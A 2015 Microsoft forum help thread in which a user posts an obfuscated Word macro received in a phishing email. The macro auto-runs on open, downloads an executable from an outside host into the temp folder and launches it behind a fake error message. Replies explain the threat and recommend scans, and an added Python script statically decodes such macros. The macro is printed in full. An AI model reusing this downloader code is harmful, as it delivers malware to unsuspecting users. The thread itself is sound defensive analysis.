Question about a Word Macro

    Question

  • Hello Team,

    Hope that someone can help me. I received an email from my energy company saying that I have a really big amount of debt, so by mistake my son opened the file. It's a Word document with a Macro in it... I have no idea about programming and I from the Macro in my Word, this is what I got:

    --------------------------------        

    Private Declare Function ShellExecuteW Lib "shell32.dll" (ByVal lpvoid1 As Long, ByVal lpvoid2 As Long, ByVal lpvoidk3 As Long, ByVal lpvoidk4 As Long, ByVal lpvoid5 As Long, ByVal lpvoidk6 As Long) As Long
                        
    Dim APPLE As String
    Dim IBM As String
    Dim MOCOSOFT As String
                        
    Private Declare Function URLDownloadToFileW Lib "urlmon.dll" (ByVal lStatus1 As Long, ByVal lStatus2 As Long, ByVal lStatus3 As Long, ByVal lStatus4 As Long, ByVal lStatus5 As Long) As Long
          
                        

    Sub Workbook_Open()
       Auto_Open
    End Sub
    Sub AutoOpen()
       Auto_Open
    End Sub
    Sub Auto_Open()
        APPLE = "===h===ttp:===//re===dxx===i.c===om.===mx/a===kam===ai/===Off===ic===e_===Wor===d.e===x===e"
        MOCOSOFT = Environ(Replace("==t=====m======p==========", "=", "")) & "\officeWord.exe"
        Call hander
    End Sub
    Public Function hander() As String()

    URLDownloadToFileW 0&, XEROX(Replace(APPLE, "=", "")), XEROX(MOCOSOFT), 0&, 0&
        
    ShellExecuteW 0&, XEROX(Replace("O=====p===e==n===", "=", "")), XEROX(MOCOSOFT), XEROX(""), XEROX(""), 1



    Call XEROX2
        
        
        
        
        Application.DisplayAlerts = False




    Application.Quit
    End Function

    Public Function XEROX(c As String) As Long
    If 1 = 2 Then
    XEROX = 3432
    Else
    XEROX = StrPtr(c)
    End If
    End Function

    Sub XEROX2()
    MsgBox "E" & "" & "st" & "" & "e d" & "" & "oc" & "" & "um" & "" & "en" & "" & "to" & "" & " no" & "" & " es" & "" & " co" & "" & "mpa" & "" & "tib" & "" & "le " & "" & "con" & "" & " es" & "" & "te " & "" & "equ" & "" & "ipo" & "" & "." & vbCrLf & vbCrLf & "P" & "" & "or " & "" & "fav" & "" & "or " & "" & "int" & "" & "ent" & "" & "e d" & "" & "esd" & "" & "e o" & "" & "tro" & "" & " e" & "" & "qui" & "" & "po.", vbCritical, "" & "" & "Equ" & "" & "ipo" & "" & " no" & "" & " co" & "" & "mpa" & "" & "tib" & "" & "le"

    End Sub

    --------------------------------        

    I already reviewed something about the Macro and as far as I understood this is something to do with Windows hacking or something like that, right? Can anyone help me by telling me what this code is and what they gather if someone opened it on a Windows computer (the file has been opened from a MacBook computer)?

    Thanks team

    Friday, September 11, 2015 4:42 PM

Answers

  • The code tries to download a program called officeWord.exe to the user's AppData\Local\Temp folder and then to run it. This is undoubtedly malware, but details are hard to come by.

    Run a full scan with your antivirus software and also with a program such as the free version of Malwarebytes Antimalware.


    Regards, Hans Vogelaar (http://www.eileenslounge.com)

    • Proposed as answer by Mike Laughlin Friday, September 11, 2015 5:59 PM
    • Marked as answer by Pablo Ayala Friday, September 11, 2015 7:49 PM
    Friday, September 11, 2015 5:02 PM
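
The analysis in the answer above can be reproduced statically, without opening the document. The following is an added example (not part of the thread and not any poster's code): a Python triage that undoes the macro's two string tricks, `Replace(..., "=", "")` padding and `"a" & "" & "b"` splitting, and flags the auto-run entry points and the declared download/launch APIs. The sample macro is constructed with a placeholder URL, and the function names are chosen here.

```python
import re

LIT = r'"(?:[^"\n]|"")*"'  # one VBA string literal; "" is an escaped quote
AUTOEXEC = {"autoopen", "auto_open", "workbook_open", "document_open"}
RISKY_APIS = {"urldownloadtofilew", "shellexecutew"}  # fetch a file / launch a file

# Constructed sample shaped like the macro in the question. The URL is a
# non-resolvable placeholder, not the one from the post.
SAMPLE = r'''
Private Declare Function URLDownloadToFileW Lib "urlmon.dll" (ByVal a As Long) As Long
Private Declare Function ShellExecuteW Lib "shell32.dll" (ByVal a As Long) As Long
Sub AutoOpen()
    APPLE = "===h===ttp:===//exa===mple.in===valid/===pay===load.e===x===e"
    MOCOSOFT = Environ(Replace("==t=====m======p==", "=", "")) & "\officeWord.exe"
    URLDownloadToFileW 0&, XEROX(Replace(APPLE, "=", "")), XEROX(MOCOSOFT), 0&, 0&
    ShellExecuteW 0&, XEROX(Replace("O=====p===e==n===", "=", "")), XEROX(MOCOSOFT), 0&, 0&, 1
    MsgBox "E" & "" & "rr" & "" & "or"
End Sub
'''

def unquote(lit):
    return lit[1:-1].replace('""', '"')

def decode_replace_calls(src):
    """Resolve Replace(x, pad, "") where x is a literal or a variable set to one."""
    found = re.findall(r'^\s*(\w+)\s*=\s*(%s)\s*$' % LIT, src, re.M)
    assigned = {name.lower(): lit for name, lit in found}
    calls = re.findall(r'Replace\(\s*(%s|\w+)\s*,\s*(%s)\s*,\s*""\s*\)' % (LIT, LIT), src, re.I)
    out = []
    for arg, pad in calls:
        lit = arg if arg.startswith('"') else assigned.get(arg.lower())
        if lit is not None:  # variables never assigned a literal stay unresolved
            out.append(unquote(lit).replace(unquote(pad), ""))
    return out

def fold_concatenations(src):
    """Join "a" & "" & "b" runs, the trick used to hide the MsgBox text."""
    runs = re.findall(r'(?:%s[ \t]*&[ \t]*)+%s' % (LIT, LIT), src)
    return ["".join(unquote(p) for p in re.findall(LIT, run)) for run in runs]

def triage(src):
    subs = re.findall(r'^\s*(?:(?:Private|Public)\s+)?Sub\s+(\w+)', src, re.M | re.I)
    apis = re.findall(r'Declare\s+(?:PtrSafe\s+)?Function\s+(\w+)', src, re.I)
    return {"autoexec": sorted({s.lower() for s in subs} & AUTOEXEC),
            "apis": sorted({a.lower() for a in apis} & RISKY_APIS),
            "decoded": decode_replace_calls(src),
            "messages": fold_concatenations(src)}

if __name__ == "__main__": print(triage(SAMPLE))
```

An auto-run entry point together with both APIs and a decoded URL plus `Open` verb is the download-and-execute pattern the answer describes.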

All replies

  • Thank you very much for the assistance.

    From the code that I reviewed, the Script is trying to download a Word.exe file, right!? It's supposed that if I'm a Mac user there will be no problem with that code, right?

    Sorry to bother you about these dumb questions :S

    Friday, September 11, 2015 6:16 PM
  • Might ask them over here.

    http://answers.microsoft.com/en-us/protect

    Regards, Dave Patrick ....
    Microsoft Certified Professional
    Microsoft MVP [Windows]

    Disclaimer: This posting is provided "AS IS" with no warranties or guarantees, and confers no rights.

    • Proposed as answer by Mike Laughlin Friday, September 11, 2015 7:21 PM
    Friday, September 11, 2015 6:30 PM
    Moderator
  • Thank you very much for the assistance.

    From the code that I reviewed, the Script is trying to download a Word.exe file, right!? It's supposed that if I'm a Mac user there will be no problem with that code, right?

    Sorry to bother you about these dumb questions :S


    I would expect the virus to be harmless on a Mac since a .exe created for Windows won't run on a Mac.

    Regards, Hans Vogelaar (http://www.eileenslounge.com)

    Friday, September 11, 2015 6:42 PM
  • Thank you very much for all the assistance. Have a great weekend.
    Friday, September 11, 2015 7:49 PM